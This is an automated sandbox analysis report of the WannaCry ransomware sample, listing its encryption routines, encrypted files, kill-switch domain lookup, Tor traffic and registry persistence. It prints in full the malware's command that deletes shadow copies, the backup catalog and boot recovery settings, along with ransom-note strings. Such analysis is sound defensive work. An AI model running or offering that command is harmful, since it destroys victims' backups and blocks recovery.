Joe Sandbox Cloud Pro Analysis Report

Loading ...

Analysis Report

Overview

General Information

Joe Sandbox Version:18.0.0
Analysis ID:269081
Start time:18:52:11
Joe Sandbox Product:Cloud
Start date:12.05.2017
Overall analysis duration:0h 12m 5s
Report type:full
Sample file name:mssecsvc.exe
Cookbook file name:default.jbs
Analysis system description:Windows 7 (Office 2010 v14.0.4, Java 1.8.0_40, Flash 16.0.0.305, Acrobat Reader 11.0.08, Internet Explorer 11, Chrome 55, Firefox 43)
Number of analysed new started processes analysed:40
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies
  • HCA enabled
  • EGA enabled
Detection:MAL
Classification:mal100.evad.rans.phis.spyw.troj.winEXE@57/432@2/8
HCA Information:
  • Successful, ratio: 72%
  • Number of executed functions: 230
  • Number of non-executed functions: 254
EGA Information:
  • Successful, ratio: 90%
Cookbook Comments:
  • Found application associated with file extension: .exe
Warnings:
Show All
  • Exclude process from analysis (whitelisted): svchost.exe, VSSVC.exe, conhost.exe, dllhost.exe
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size exceeded maximum capacity and may have missing disassembly code.
  • Report size getting too big, too many NtCreateFile calls found.
  • Report size getting too big, too many NtOpenFile calls found.
  • Report size getting too big, too many NtQueryDirectoryFile calls found.
  • Report size getting too big, too many NtSetInformationFile calls found.
  • Too many dropped files, some of them have not been restored


Detection

StrategyScoreRangeReportingDetection
Threshold1000 - 100Report FP / FNmalicious


Confidence

StrategyScoreRangeFurther Analysis Required?Confidence
Threshold50 - 5false
ConfidenceConfidence


Classification

Analysis Advice

Sample drops PE files which have not been started, submit dropped PE samples for a secondary analysis to Joe Sandbox
Sample has a GUI, but Joe Sandbox has not found any clickable buttons, likely requires more UI automation
Sample is a service DLL but no service has been registered
Sample sleeps for a long time, analyze it with the 'Bypass long sleeps' cookbook
Uses HTTPS for network communication, use the 'Proxy HTTPS (port 443) to read its encrypted data' cookbook for further analysis



Signature Overview

Click to jump to signature section


Change of System Appearance:

barindex
Contains functionalty to change the wallpaperShow sources
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeCode function: 5_2_10004F20 swprintf,swprintf,MultiByteToWideChar,CopyFileW,CopyFileW,GetUserNameW,_wcsicmp,SystemParametersInfoW,swprintf,CopyFileW,5_2_10004F20
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exeCode function: 14_2_00407E80 SHGetFolderPathW,wcslen,swprintf,MultiByteToWideChar,CopyFileW,SystemParametersInfoW,14_2_00407E80
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exeCode function: 18_1_00407E80 SHGetFolderPathW,wcslen,swprintf,MultiByteToWideChar,CopyFileW,SystemParametersInfoW,18_1_00407E80

Operating System Destruction:

barindex
Mass deletion, destroys many filesShow sources
Source: c:\programdata\ywepvofkuzu108\tasksche.exeFile deleted: Number of file deletion 1001 exceeds threshold 400

Cryptography:

barindex
Public key (encryption) foundShow sources
Source: taskhsvc.exeBinary or memory string: -----BEGIN RSA PUBLIC KEY-----
Uses Microsoft's Enhanced Cryptographic ProviderShow sources
Source: C:\Windows\tasksche.exeCode function: 3_2_004018B9 CryptReleaseContext,3_2_004018B9
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeCode function: 5_2_10004170 CryptExportKey,CryptGetKeyParam,GlobalAlloc,CryptEncrypt,GlobalFree,5_2_10004170
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeCode function: 5_2_10003C00 CryptDestroyKey,5_2_10003C00
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeCode function: 5_2_10003AC0 CryptImportKey,CryptImportKey,CryptDestroyKey,5_2_10003AC0
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeCode function: 5_2_10004040 CryptExportKey,GlobalAlloc,CryptExportKey,_local_unwind2,CreateFileA,WriteFile,_local_unwind2,5_2_10004040
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeCode function: 5_2_10004350 CryptGenKey,5_2_10004350
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeCode function: 5_2_10003F00 GetFileAttributesA,GetFileAttributesA,CreateFileA,GetFileSize,GlobalAlloc,ReadFile,GetFileAttributesA,CryptImportKey,_local_unwind2,_local_unwind2,5_2_10003F00
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeCode function: 5_2_10004440 CryptAcquireContextA,wcsrchr,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CryptAcquireContextA,CryptImportKey,CryptDestroyKey,CryptEncrypt,CryptDecrypt,5_2_10004440
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeCode function: 5_2_10004370 EnterCriticalSection,CryptEncrypt,LeaveCriticalSection,LeaveCriticalSection,5_2_10004370
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeCode function: 5_2_10004420 CryptGenRandom,5_2_10004420
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeCode function: 5_2_10003D10 GetFileAttributesA,CryptEncrypt,_local_unwind2,CryptDecrypt,GetFileAttributesA,strncmp,_local_unwind2,5_2_10003D10
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeCode function: 5_2_10003A80 GetFileAttributesA,GetFileAttributesA,CryptAcquireContextA,5_2_10003A80
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeCode function: 5_2_10003BB0 GetFileAttributesA,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,5_2_10003BB0
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exeCode function: 14_2_004046F0 CryptImportKey,14_2_004046F0
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exeCode function: 14_2_004046B0 CryptAcquireContextA,14_2_004046B0
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exeCode function: 14_2_004049B0 CreateFileA,GetFileSize,GlobalAlloc,ReadFile,CryptImportKey,_local_unwind2,_local_unwind2,14_2_004049B0
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exeCode function: 14_2_004047C0 CryptEncrypt,_local_unwind2,CryptDecrypt,strncmp,_local_unwind2,14_2_004047C0
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exeCode function: 14_2_00404AF0 EnterCriticalSection,CryptDecrypt,LeaveCriticalSection,LeaveCriticalSection,14_2_00404AF0
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exeCode function: 14_2_00404770 CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,14_2_00404770
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exeCode function: 14_2_00404B70 CryptAcquireContextA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CryptAcquireContextA,CryptImportKey,CryptDestroyKey,CryptEncrypt,CryptDecrypt,14_2_00404B70
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exeCode function: 18_1_00404770 CryptReleaseContext,18_1_00404770
Source: C:\ProgramData\ywepvofkuzu108\TaskData\Tor\taskhsvc.exeCode function: 19_2_0033D6F1 CRYPTO_num_locks,CRYPTO_set_locking_callback,CRYPTO_THREADID_set_callback,__stack_chk_fail,19_2_0033D6F1
Source: C:\ProgramData\ywepvofkuzu108\TaskData\Tor\taskhsvc.exeCode function: 19_2_00335EA1 ERR_load_crypto_strings,OPENSSL_add_all_algorithms_noconf,SSLeay_version,strcmp,__stack_chk_fail,19_2_00335EA1
Source: C:\ProgramData\ywepvofkuzu108\TaskData\Tor\taskhsvc.exeCode function: 19_2_0033C797 abort,CryptAcquireContextA,CryptGenRandom,__stack_chk_fail,19_2_0033C797
Source: C:\ProgramData\ywepvofkuzu108\TaskData\Tor\taskhsvc.exeCode function: 19_2_00339423 i2d_RSAPrivateKey,free,CRYPTO_free,__stack_chk_fail,19_2_00339423
Source: C:\ProgramData\ywepvofkuzu108\TaskData\Tor\taskhsvc.exeCode function: 19_2_0033E737 i2d_X509,free,X509_free,memcpy,CRYPTO_free,X509_get_pubkey,EVP_PKEY_get1_RSA,EVP_PKEY_free,__stack_chk_fail,19_2_0033E737
Source: C:\ProgramData\ywepvofkuzu108\TaskData\Tor\taskhsvc.exeCode function: 19_2_00337FA7 abort,abort,abort,abort,abort,RSA_public_decrypt,__stack_chk_fail,19_2_00337FA7

Spam, unwanted Advertisements and Ransom Demands:

barindex
Contains functionality to import cryptographic keys (often used in ransomware)Show sources
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeCode function: 5_2_10003AC0 CryptImportKey,CryptImportKey,CryptDestroyKey,5_2_10003AC0
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeCode function: 5_2_10003F00 GetFileAttributesA,GetFileAttributesA,CreateFileA,GetFileSize,GlobalAlloc,ReadFile,GetFileAttributesA,CryptImportKey,_local_unwind2,_local_unwind2,5_2_10003F00
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeCode function: 5_2_10004440 CryptAcquireContextA,wcsrchr,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CryptAcquireContextA,CryptImportKey,CryptDestroyKey,CryptEncrypt,CryptDecrypt,5_2_10004440
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exeCode function: 14_2_004046F0 CryptImportKey,14_2_004046F0
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exeCode function: 14_2_004049B0 CreateFileA,GetFileSize,GlobalAlloc,ReadFile,CryptImportKey,_local_unwind2,_local_unwind2,14_2_004049B0
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exeCode function: 14_2_00404B70 CryptAcquireContextA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CryptAcquireContextA,CryptImportKey,CryptDestroyKey,CryptEncrypt,CryptDecrypt,14_2_00404B70
Deletes shadow drive data (may be related to ransomware)Show sources
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
Source: unknownProcess created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quiet
Source: unknownProcess created: C:\Windows\System32\wbem\WMIC.exe wmic shadowcopy delete
Source: @WanaDecryptor@.exeBinary or memory string: /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
Source: @WanaDecryptor@.exeBinary or memory string: A%s %scmd.exe/c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietvscofi13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94Englishm_%s.wnrymsg\<https://<http://%d/%d/%d %02d:%02d:%02d00;00;00;00http://www.btcfrog.com/qr/bitcoinPNG.php?address=%smailto:%shttps://www.google.com/search?q=how+to+buy+bitcoinhttps://en.wikipedia.org/wiki/BitcoinSend %.1f BTC to this address:%.1f BTCSend $%d worth of bitcoin to this address:$%d%02d;%02d;%02d;%02d
Source: @WanaDecryptor@.exeBinary or memory string: /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
Source: @WanaDecryptor@.exeBinary or memory string: cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
Source: @WanaDecryptor@.exeBinary or memory string: 2@Z3EDITc vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietffv
Source: @WanaDecryptor@.exeBinary or memory string: C:\ProgramData\ywepvofkuzu108\C:\Windows\system32;;C:\Windows\system32;C:\Windows\system;C:\Windows;.;C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\system32\cmd.execmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietC:\Windows\system32\cmd.exe=C:=C:\ProgramData\ywepvofkuzu108ALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Windows\system32\config\systemprofile\AppData\RoamingCommonProgramFiles=C:\Program Files\Common FilesCOMPUTERNAME=ADMIN-PCComSpec=C:\Windows\system32\cmd.exeFP_NO_HOST_CHECK=NOLOCALAPPDATA=C:\Windows\system32\config\systemprofile\AppData\LocalNUMBER_OF_PROCESSORS=1OS=Windows_NTPath=C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;
Source: @WanaDecryptor@.exeBinary or memory string: A%s %scmd.exe/c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietvscofi13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94Englishm_%s.wnrymsg\<https://<http://%d/%d/%d %02d:%02d:%02d00;00;00;00http://www.btcfrog.com/qr/bitcoinPNG.php?address=%smailto:%shttps://www.google.com/search?q=how+to+buy+bitcoinhttps://en.wikipedia.org/wiki/BitcoinSend %.1f BTC to this address:%.1f BTCSend $%d worth of bitcoin to this address:$%d%02d;%02d;%02d;%02d
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quiet
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic shadowcopy delete
Source: vssadmin.exeBinary or memory string: Example Usage: vssadmin Delete ShadowStorage
Source: vssadmin.exeBinary or memory string: Example Usage: vssadmin Delete Shadows /Type=ClientAccessible /For=C:
Source: vssadmin.exeBinary or memory string: vssadmin Delete Shadows
Source: vssadmin.exeBinary or memory string: Example Usage: vssadmin Delete Shadows /For=C: /Oldest
Source: vssadmin.exeBinary or memory string: Example Usage: vssadmin Delete ShadowStorage /For=C: /On=D:
May disable shadow drive data (uses vssadmin)Show sources
Source: unknownProcess created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quiet
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quiet
Ransomware detected (based on file extension or ransom instructions from fsrm.experiant.ca)Show sources
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\All Users\Microsoft\Windows NT\MSScan\WelcomeScan.jpg.WNCRY
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Microsoft\Internet Explorer\brndlog.txt.WNCRY
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\Bears.jpg.WNCRY
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\Blue_Gradient.jpg.WNCRY
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\Garden.jpg.WNCRY
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\GreenBubbles.jpg.WNCRY
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\HandPrints.jpg.WNCRY
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\Monet.jpg.WNCRY
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\Notebook.jpg.WNCRY
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\OrangeCircles.jpg.WNCRY
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\Peacock.jpg.WNCRY
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\Pine_Lumber.jpg.WNCRY
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\Pretty_Peacock.jpg.WNCRY
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\Psychedelic.jpg.WNCRY
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\Roses.jpg.WNCRY
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\Sand_Paper.jpg.WNCRY
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\ShadesOfBlue.jpg.WNCRY
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\Small_News.jpg.WNCRY
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\SoftBlue.jpg.WNCRY
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\Stars.jpg.WNCRY
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\Tanspecks.jpg.WNCRY
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\White_Chocolate.jpg.WNCRY
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg.WNCRY
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\revocations.txt.WNCRY
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\Public\Music\Sample Music\AlbumArt_{5FA05D35-A682-4AF6-96F7-0773E42D4D16}_Large.jpg.WNCRY
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\Public\Music\Sample Music\AlbumArt_{5FA05D35-A682-4AF6-96F7-0773E42D4D16}_Small.jpg.WNCRY
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\Public\Pictures\Sample Pictures\Chrysanthemum.jpg.WNCRY
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\Public\Pictures\Sample Pictures\Desert.jpg.WNCRY
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\Public\Pictures\Sample Pictures\Hydrangeas.jpg.WNCRY
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\Public\Pictures\Sample Pictures\Jellyfish.jpg.WNCRY
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\Public\Pictures\Sample Pictures\Koala.jpg.WNCRY
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\Public\Pictures\Sample Pictures\Lighthouse.jpg.WNCRY
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\Public\Pictures\Sample Pictures\Penguins.jpg.WNCRY
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\Public\Pictures\Sample Pictures\Tulips.jpg.WNCRY
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png.WNCRY
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png.WNCRY
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png.WNCRY
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png.WNCRY
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png.WNCRY
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png.WNCRY
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Windows.edb.WNCRY
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\All Users\Microsoft\User Account Pictures\guest.bmp.WNCRY
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\All Users\Microsoft\User Account Pictures\user.bmp.WNCRY
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile10.bmp.WNCRY
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile11.bmp.WNCRY
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile12.bmp.WNCRY
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile13.bmp.WNCRY
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile14.bmp.WNCRY
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile15.bmp.WNCRY
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile16.bmp.WNCRY

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Contains functionality for read data from the clipboardShow sources
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exeCode function: 14_2_004035A0 SendMessageA,SendMessageA,OpenClipboard,SendMessageA,#3301,#924,#800,#800,SendMessageA,GlobalAlloc,GlobalLock,GlobalFree,SendMessageA,#3301,#924,#800,MultiByteToWideChar,wcslen,wcslen,#800,SendMessageA,GlobalUnlock,EmptyClipboard,SetClipboardData,CloseClipboard,14_2_004035A0

Networking:

barindex
Contains functionality to download additional files from the internetShow sources
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exeCode function: 14_2_0040DB80 recv,14_2_0040DB80
Downloads files from webservers via HTTPShow sources
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comCache-Control: no-cache
Found strings which match to known social media urlsShow sources
Source: @WanaDecryptor@.exeString found in binary or memory: Yahoo equals www.yahoo.com (Yahoo)
Source: taskhsvc.exeString found in binary or memory: www.google.com,www.mit.edu,www.yahoo.com,www.slashdot.org equals www.yahoo.com (Yahoo)
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
Urls found in memory or binary dataShow sources
Source: @WanaDecryptor@.exeString found in binary or memory: http://
Source: @WanaDecryptor@.exeString found in binary or memory: http://%d/%d/%d
Source: taskhsvc.exeString found in binary or memory: http://%s
Source: taskhsvc.exeString found in binary or memory: http://%s:%d
Source: taskhsvc.exeString found in binary or memory: http://%s:%dhttp://%s
Source: taskhsvc.exeString found in binary or memory: http://%sencoding
Source: taskhsvc.exeString found in binary or memory: http://freehaven.net/anonbib/#hs-attack06
Source: taskhsvc.exeString found in binary or memory: http://skipping
Source: @WanaDecryptor@.exeString found in binary or memory: http://www.btcfrog.com/qr/bitcoinpng.php?address=%s
Source: @WanaDecryptor@.exeString found in binary or memory: http://www.btcfrog.com/qr/bitcoinpng.php?address=%smailto:%shttps://www.google.com/search?q=how
Source: mssecsvc.exeString found in binary or memory: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
Source: mssecsvc.exeString found in binary or memory: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
Source: taskhsvc.exeString found in binary or memory: http://www.openssl.org/support/faq.html
Source: taskhsvc.exeString found in binary or memory: http://www.openssl.org/support/faq.htmlrand
Source: taskhsvc.exeString found in binary or memory: http://www.openssl.org/v
Source: @WanaDecryptor@.exeString found in binary or memory: http://www.zlib.net/d
Source: @WanaDecryptor@.exeString found in binary or memory: https://
Source: taskhsvc.exeString found in binary or memory: https://blog.torproject.org/blog/lifecycle-of-a-new-relay
Source: taskhsvc.exeString found in binary or memory: https://blog.torproject.org/blog/lifecycle-of-a-new-relayerror
Source: @WanaDecryptor@.exeString found in binary or memory: https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip
Source: @WanaDecryptor@.exeString found in binary or memory: https://en.wikipedia.org/wiki/bitcoin
Source: @WanaDecryptor@.exeString found in binary or memory: https://en.wikipedia.org/wiki/bitcoinsend
Source: taskhsvc.exeString found in binary or memory: https://trac.torproject.org/8742
Source: taskhsvc.exeString found in binary or memory: https://trac.torproject.org/projects/tor/ticket/14917.
Source: taskhsvc.exeString found in binary or memory: https://wiki.torproject.org/theonionrouter/torfaq#socksanddns.%s
Source: taskhsvc.exeString found in binary or memory: https://wiki.torproject.org/theonionrouter/torfaq#socksanddns.%sdangerous_socks
Source: @WanaDecryptor@.exeString found in binary or memory: https://www.google.com/search?q=how
Source: taskhsvc.exeString found in binary or memory: https://www.torproject.org/
Source: taskhsvc.exeString found in binary or memory: https://www.torproject.org/docs/faq.html#bestosforrelay
Source: taskhsvc.exeString found in binary or memory: https://www.torproject.org/documentation.html
Source: taskhsvc.exeString found in binary or memory: https://www.torproject.org/download/download#warning
Source: taskhsvc.exeString found in binary or memory: https://www.torproject.org/download/download#warningalphabetathis
Uses HTTPSShow sources
Source: unknownNetwork traffic detected: HTTP traffic on port 49197 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49197
Source: unknownNetwork traffic detected: HTTP traffic on port 49196 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49195
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49196
Source: unknownNetwork traffic detected: HTTP traffic on port 49195 -> 443
HTTP GET or POST without a user agentShow sources
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comCache-Control: no-cache
Detected TCP or UDP traffic on non-standard portsShow sources
Source: global trafficTCP traffic: 192.168.1.16:49198 -> 79.137.85.71:9001
Source: global trafficTCP traffic: 192.168.1.16:49199 -> 195.154.107.23:993
Source: global trafficTCP traffic: 192.168.1.16:49200 -> 138.68.0.4:9090
Installs TOR (Internet Anonymizer)Show sources
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exeFile created: C:\ProgramData\ywepvofkuzu108\TaskData\Tor\tor.exe

Boot Survival:

barindex
Contains functionality to start windows servicesShow sources
Source: C:\mssecsvc.exeCode function: 0_2_00408090 GetModuleFileNameA,__p___argc,OpenSCManagerA,InternetCloseHandle,OpenServiceA,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherA,0_2_00408090
Creates an autostart registry keyShow sources
Source: C:\Windows\System32\reg.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ywepvofkuzu108
Source: C:\Windows\System32\reg.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ywepvofkuzu108
Creates a start menu entry (Start Menu\Programs\Startup)Show sources
